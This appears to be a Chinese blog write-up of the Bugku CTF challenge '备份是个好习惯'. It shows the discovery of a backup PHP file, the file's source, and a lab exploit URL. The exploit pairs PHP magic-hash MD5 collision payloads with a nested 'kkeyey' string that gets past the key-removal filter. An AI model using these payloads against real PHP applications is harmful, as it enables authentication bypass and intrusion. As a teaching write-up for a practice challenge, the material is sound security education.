ctf.bugku-备份是个好习惯

访问页面得到字符串

这串字符串是重复的; d41d8cd98f00b204e9800998ecf8427e

从前端、源码上看,除了这段字符串,没有其他信息;尝试解密,长度32位;各种解密方式试试;

MD5免费在线解密破解_MD5在线加密-SOMD5

解密后是空字符串;没有有用信息;

查看后端:

使用dirsearch 扫描后端服务;

查到一个 index.php.bak 文件 ,代码如下:(注释我自己补上的)

复制代码
<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');   //php strstr() 函数搜索一个字符串在另一个字符串中是否存在,如果是,返回该字符串及后面剩余部分;
$str = substr($str,1);                         // 返回第一个字符后面的字符; 相当于把 ? 删除;
$str = str_replace('key','',$str);             // 把 key 替换成空格
parse_str($str);                               //把查询字符串解析到变量中:让 key1 = xx ,key2 = yy;
echo md5($key1);                               //key1 回显

echo md5($key2);                               //key2 回显
if(md5($key1) == md5($key2) && $key1 !== $key2){   //比较,若key1 和key2的md5值相等,且key1、key2 不等;得到flay
    echo $flag."取得flag";
}
?>

所以根据代码逆向构造,并且这里使用了一个php 的bug

PHP在处理哈希字符串时,会利用"!="或"=="来对哈希值进行比较,它把每一个以"0E"开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以"0E"开头的,那么PHP将会认为他们相同,都是0。

常见payload有:

复制代码
    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a

所以:构造参数

复制代码
http://114.67.175.224:13384/?kkeyey1=240610708&kkeyey2=QNKCDZO

得到flag

参考文档:

PHP strstr() 函数 | 菜鸟教程 (runoob.com)

PHP 函数漏洞总结 - zw1sh - 博客园 (cnblogs.com)

相关推荐
ALe要立志成为web糕手1 天前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
TazmiDev1 天前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注
uwvwko2 天前
ctfhow——web入门214~218(时间盲注开始)
前端·数据库·mysql·ctf
uwvwko10 天前
ctfshow——web入门191~194
前端·数据库·mysql·安全·ctf
不想学密码的程序员不是好的攻城狮12 天前
TGCTF web
python·网络安全·web·ctf
huan666*21 天前
CTF类题目复现总结-hashcat 1
ctf·office文件密码破解·john工具使用
ALe要立志成为web糕手23 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
ad禥思妙想24 天前
NSSCTF(MISC)—[justCTF 2020]pdf
ctf·misc
石氏是时试1 个月前
[VolgaCTF 2025] Baby-Welcome,BrokeBroke,Field Rules
ctf
Sweet_vinegar1 个月前
变量1(WEB)
安全·web·ctf·bugku